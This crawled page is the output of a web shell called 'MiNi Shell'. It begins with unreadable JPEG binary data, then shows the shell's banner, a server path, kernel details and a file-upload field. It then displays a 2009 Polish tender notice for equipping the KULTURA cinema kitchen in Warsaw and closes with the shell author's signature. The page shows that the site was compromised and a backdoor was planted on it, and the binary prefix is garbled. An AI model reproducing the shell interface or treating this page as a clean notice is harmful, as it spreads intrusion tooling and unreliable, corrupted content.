JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/42267-N-2009.html

<p class="kh_header"><b>Warszawa: Kompleksowe wyposażenie gastronomiczne kina KULTURA  w Warszawie przy ul. Krakowskie Przedmieście 21-23</b><br>
<b>Numer ogłoszenia: 42267 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stowarzyszenie Filmowców Polskich , ul. Puławska 61, 02-595 Warszawa, woj. mazowieckie, tel. 0-22 845 51 32,  826 39 08, faks 0-22 845 39 08,  826 22 72.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sfp.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe wyposażenie gastronomiczne kina KULTURA  w Warszawie przy ul. Krakowskie Przedmieście 21-23.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zapewnienie kompleksowego wyposażenia gastronomicznego w kinie KULTURA  w Warszawie przy ul. Krakowskie Przedmieście 21-23. Przedmiot zamówienia obejmuje dostawę (własny transport Wykonawcy i wniesienie wyposażenia) oraz montaż przez wykonawcę urządzeń i wyposażenia w zakresie(Dane są wpisane w sposób nastepujacy: lp.;Wyszczególnienie;Typ;Gabaryty w mm:Dług.,Szer.,Wys.;Ilość szt.;Moc jedn. kW;Moc ogółem kW;	Napięcie zasilania V;	Doprow.jednost.  gazu m3;	Doprow.ogółem gazu m3;	Wod-kan	Dane techniczne
1)Kuchnia. 1.;Piec konwekcyjno-parowy 10-1GN z podstawą + komplet gastropojemników; 	XXXXXXXX;	900;	871;	1580;	1;	18,3;	18,3;	400;	XXXX;	XXXX;	zw + odpływ;	dopr. prądu 400V ze ściany  do listwy zaciskowej, zapas kabla 2,5m  -na ścianie należy przewidzieć wyłącznik prądu, dopr. wody zimnej śr. 0,75 zakończone zaworem kulowym  na wys. 0,3 m od posadzki, odpływ do kratki ściekowej rurą sztywną  lub przez otwarty lejek;1a.;Okap nad piec  konwekcyjno-parowy z filtrem i oświetleniem	;xxxx;	876;	1220;	401;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;
2.;	Stół chłodniczy z 4 szufladami i rantem;	XXXXXXXX;	1325;	700;	850;	1;	0,375;	0,375;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230V na wys. 0,15 m od posadzki;2a.;
	Stół  do pracy z szafką, rant z tyłu;	XXXXXXXX;	700;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;
3.;	Kuchenka mikrofalowa;	XXXXXXXX;	510;	420;	305;	1;	1,0;	1,0;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V na wys. 1,2 m od posadzki;	
4.;	Półka podwójna;	XXXXXXXX;	1100;	300;	600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	
5.;	Okap z filtrem i oświetleniem przyścienny;	wg projektu wentylacji;	2600;	2000;	400;	1;	0,1;	0,1;	230;	XXXX;	XXXX;	XXXX;	doprowadzenie prądu do celów oświetleniowych; 6.;	Stół  do pracy z półką, rant z tyłu;	wg projektu wentylacji;	1700;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	7.;	Frytkownica 1-komorowa z podstawą z drzwiami; 	XXXXXXXX;	315;	425;	290;	2;	3,6;	7,2;	230;	XXXX;	XXXX;	XXXX;	dopr. prądu 230V z , zapas kabla 2,5m;  	8.;	Płyta grillowa na kamienie lawy gazowa;	XXXXXXXX;	400;	700;	900;	2;	XXXX;	XXXX;	XXXX;	1,5;	3;	XXXX;	doprowadzenie gazu  o 0,5 zakończone zaworem kulowym; 	9.;	Trzon kuchenny gazowy  4-palnikowy z piekarnikiem elektrycznym;	XXXXXXXX;	700;	750           lub               700;	850;	4;	5,4;	21,6;	400;	2,6;	10,4;	XXXX;	doprowadzenie gazu średnica 0,5 zakończone zaworem kulowym;dopr. prądu 400V posadzki  do listwy zaciskowej  , zapas kabla 2,5m  -na ścianie należy przewidzieć wyłącznik prądu; 	
10.;Półka podwójna;	XXXXXXXX;	1300;	300;	700;	2;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	11.;	Stół chłodniczy z 4 szufladami i rantem;	XXXXXXXX;	950;	600;	850;	1;	0,375;	0,375;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230V na wys. 0,3 m od posadzki (gniazdo do stołu chłodniczego pod stołem;	12.;	Stół do pracy z półką rant z tyłu i prawej strony;	XXXXXXXX;	1200;	600;	600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;
13.;	Szafka wisząca z drzwiami suwanymi;	XXXXXXXX;	1200;	300;	600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	14.;	Waga elektroniczna stołowa 15 kg;	XXXXXXXX;	XXXX;	XXXX;	XXXX;	1;	0,1;	0,1;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V na wys. 1,2 m od posadzki;	15.;	Szafka wisząca z drzwiami suwanymi;	XXXXXXXX;	1500;	300;	600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	16.;	Stół z 1-komorowym zlewozmywakiem+ półka , rant z tyłu;	XXXXXXXX;	1500;	700;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej o 0,5 zakończone zaworem kulowym na wys. 0,45 m,  ; odpływ na wys.0,40 m od  posadzki;	
17.;	Basen, rant z tyłu   (głębokość basenu h=400mm);	XXXXXXXX;	1000;	700;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej na wys. 1,1 m,  zakończone baterią ścienną o 0,5; odpływ na wys.0,25 m od  posadzki;		 17a.;     Bateria ciśnieniowa z napełniaczem ;	XXXXXXXX;	XXXX;	XXXX;	XXXX;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX; zw + cw + odpływ	doprow. wody ciepłej i zimnej na wys. 1,1 m,  zakończone baterią ścienną o 0,5 ; odpływ na wys.0,25 m od  posadzki;	
	17b).;Eliminator odpadków z syfonem;	XXXX;	XXXX;	XXXX;	XXXX;	1;	0,736;	0,736;	230;	XXXX;	XXXX; zw + cw + odpływ	doprow. wody ciepłej i zimnej na wys. 1,1 m,  zakończone baterią ścienną o0,5; odpływ na wys.0,25 m od  posadzki;				
18.;Regał na naczynia czyste;	XXXX;	800;	700;	1800;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	19.;	Stół z 1-komorowym zlewozmywakiem+ półka , rant z tyłu;	XXXX;	1500;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	 doprow. wody ciepłej i zimnej o0,5 zaworem kulowym na wys. 0,45 m,  ; odpływ na wys.0,40 m od  posadzki;	
20.;Półka podwójna;	XXXX;	1500;	300;	700;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	21.;	Umywalka;	XXXX;	400;	350;	120;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej  o 0,5 zakończone zaworem kulowym na wys. 0,55 m, ; odpływ na wys.0,5 m od  posadzki;	22.;	Szafa na naczynia czyste z drzwiami suwanymi;	XXXX;	800;	500;	2000;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	2) Magazyn:														
23.;	 Regał magazynowy;	XXXX;	1200;	500;	1600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	
3)Komunikacja:														
24.;	Szafa na produkty suche;	XXXX;	1000;	500;	2000;	2;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	25.;	Zlew porządkowy;	XXXX;	600;	500;	350;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej  o 0,5  zakończone baterią ścienna na wys. 1,1 m, ; odpływ na wys.0,25 m od  posadzki; 	26.;	Szafka na środki czystości i sprzęt porządkowy;	XXXX;	900;	400;	700;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	
4)Pomieszczenie mycia warzyw:														
27.;Stół z 1-komorowym zlewozmywakiem+ półka , rant z tyłu;	XXXX;	900;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej o0,5 zakończone zaworem kulowym na wys. 0,45 m,  ; odpływ na wys.0,40 m od  posadzki;	28.;	Półka podwójna;	XXXX;	900;	300;	700;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	29.;	Szafa chłodnicza na warzywa;	XXXX;	600;	600;	1800;	1;	0,35;	0,35;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V na wys. 2,0 m od posadzki;	5)Pomieszczenie socjalne personelu:														
30.;	Szafka stojąca pod zlewozmywak;	XXXX;	800;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	31.;	Zlewozmywak 1-komorowy;	XXXX;	400;	400;	250;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej o0,5 zakończone zaworem kulowym na wys. 0,45 m,  ; odpływ na wys.0,40 m od  posadzki;	
32.;	Czajnik bezprzewodowy;	XXXX;	XXXX;	XXXX;	XXXX;	1;	1,8;	1,8;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V na wys. 1,20 m od posadzki;	33.;	Szafka wisząca na naczynia czyste;	XXXX;	800;	300;	600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;		6)Bar:
										
34.;	Zlewozmywak 1- komorowy do mycia szkła; 	XXXX;	400;	400;	250;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ gniazdo prądu 230 V na wys. 0,6 m; doprow. wody zimnej o0,5  zakończone zaworem kulowym na wys. 0,15 m od posadzki; odpływ do kratki ściekowej;	35.;	Zmywarka do szkła; XXXX;	430;	530;	685;	1;	3,5;	3,5;	230;	XXXX;	XXXX;	zw + odpływ	gniazdo prądu 230 V na wys. 0,6 m; doprow. wody zimnej o0,5  zakończone zaworem kulowym na wys. 0,15 m od posadzki; odpływ do kratki ściekowej;	
36.;	Zlewozmywak 1- komorowy do mycia sprzętu barowego; XXXX;	400;	400;	250;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	gniazdo prądu 230 V na wys. 0,6 m; doprow. wody zimnej o0,5 zakończone zaworem kulowym na wys. 0,15 m od posadzki; odpływ do kratki ściekowej;	37.;	Kostkarka do lodu;	XXXX;	376;	550;	767;	1;	0,35;	0,35;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V wbudowane w regał ekspozycyjny; doprowadzenie wody zimnej 0,5  zakończone zaworem kulowym na wys.0,15 m od posadzki, odpływ do kratki ściekowej;	38.;	Regał zapleczowy;	XXXX;	900;	600;	1800;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	39.;	Ekspres do kawy 2- naparzaczowy;	XXXX;	700;	500;	490;	1;	3,5;	3,5;	400;	XXXX;	XXXX;	zw + odpływ	gniazdo prądu 400 V wbudowane w ladę barową; doprowadzenie wody zimnej  o0,5, odpływ  na wys. 0,45 od posadzki; 
40.;	Kasa fiskalna;	XXXX;	XXXX;	XXXX;	XXXX;	XXX;	0,1;	0;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V wbudowane w ladę barową;	41.;	Zamrażarka do lodów;	XXXX;	600;	600;	820;	1;	0,6;	0,6;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230V na wys. 0,6 m od posadzki;	7)PARTER. 
												
	7a)Rozdzielnia kelnerska:													
42.;	Kasa fiskalna;	XXXX;	XXXX;	XXXX;	XXXX;	1;	0,02;	0,02;	230;	XXXX;	XXXX;	XXXX;	gniazdo prądu 230 V na wys. 1,2 m od posadzki;	43.;	Ekspres do kawy 2- naparzczowy;	XXXX;	700;	500;	490;	1;	3,5;	3,5;	400;	XXXX;	XXXX;	zw + odpływ	gniazdo prądu 400 V wbudowane w ladę barową; doprowadzenie wody zimnej  o0,5, odpływ do kratki ściekowej;	44.;	Szafka wisząca;	XXXX;	900;	300;	600;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	45.;	Stół z szafką otwartą oraz 3 szufladami, rant z tyłu;	XXXX;	900;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	7b) Zmywalnia naczyń stołowych:														
46.;	Stół z 1-komorowym zlewozmywakiem do mycia wstępnego bez półki z wysokim rantem;	XXXX;	1500;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej o0,5 zakończone zaworem kulowym na wys. 0,45 m,  ; odpływ na wys.0,40 m od  posadzki;	
	47.;Bateria ciśnieniowa ze spryskiwaczem	;XXXX;	XXXX;	XXXX;	XXXX;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	zw + cw + odpływ	doprow. wody ciepłej i zimnej o0,5 zakończone zaworem kulowym na wys. 0,45 m,  ; odpływ na wys.0,40 m od  posadzki;	
			48.; Eliminator odpadków z syfonem;	XXXX;	XXXX;	XXXX;	XXXX;	1;	0,736;	0,736;	230;	XXXX;	XXXX;		zw + cw + odpływ, doprowadzenie prądu 230 V;
49.;	Stół narożny;	XXXX;	600;	600;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	50.;	Zmywarka do naczyń stołowych na podstawie;	XXXX;	600;	600;	1300;	1;	0,736;	0,736;	230;	XXXX;	XXXX;	zw + cw + odpływ	gniazdo prądu 400 V z wyłącznikiem, na wys. 1,4 m od posadzki; doprow. wody ciepłej i zimnej śr.  0,75 zakończone zaworem kulowym na wys. 0,4 m od posadzki; odpływ do kratki ściekowej;	

51.;	Stół odkładczy;	XXXX;	700;	400;	850;	1;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	XXXX;	
52.;	Szafa chłodnicza 500 l;	XXXX;	620;	700;	2000;	2;	0,35;	0,35;	230;	XXXX;	XXXX;	XXXX;	XXXX;
53.;	Szafa mroźnicza 500 l;	XXXX;	620;	700;	2000;	2;	0,7;	0,7;	230;	XXXX	XXXX	XXXX	XXXX

Wykonawca jest zobowiązany do dostarczenia wyposażenia kina oraz montażu w terminie 14 dni od dnia otrzymania od Zamawiającego informacji o możliwości dokonania montażu. Wykonawca jest zapewnić  Zamawiającemu szkolenie BHP. Planowany termin przekazania  informacji o możliwości dokonania montażu: nie wcześniej niż 20 maja 2009r., nie później niż 01 czerwca 2009r. Wykonawca jest zobowiązany wystawić gwarancję na oferowane wyposażenie w dniu podpisania protokołu odbioru przedmiotu zamówienia. Okres gwarancji: 24 miesiące od dnia podpisania protokołu odbioru..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 42.21.41.00-0, 42.39.00.00-6, 39.31.40.00-6, 39.71.13.62-4, 39.15.10.00-5, 39.31.20.00-2, 42.21.40.00-9, 44.41.00.00-7, 30.14.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych:

1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.  
2.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:


a.	Oświadczenie Wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych  wg wzoru stanowiącego załącznik nr 3 do SIWZ.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z podmiotów występujących wspólnie.

b.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt. b) składa odpowiednio dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: 
1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości 
Dokumenty o których mowa punkcie 1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sfp.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stowarzyszenie Filmowców Polskich
ul. Krakowskie Przedmieście 7,
00-068 Warszawa..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 16:30, miejsce: Oferty winny być złożone w Sekretariacie Stowarzyszenia Filmowców Polskich mieszczącym się w Warszawie (00-068) przy ul. Krakowskie Przedmieście 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com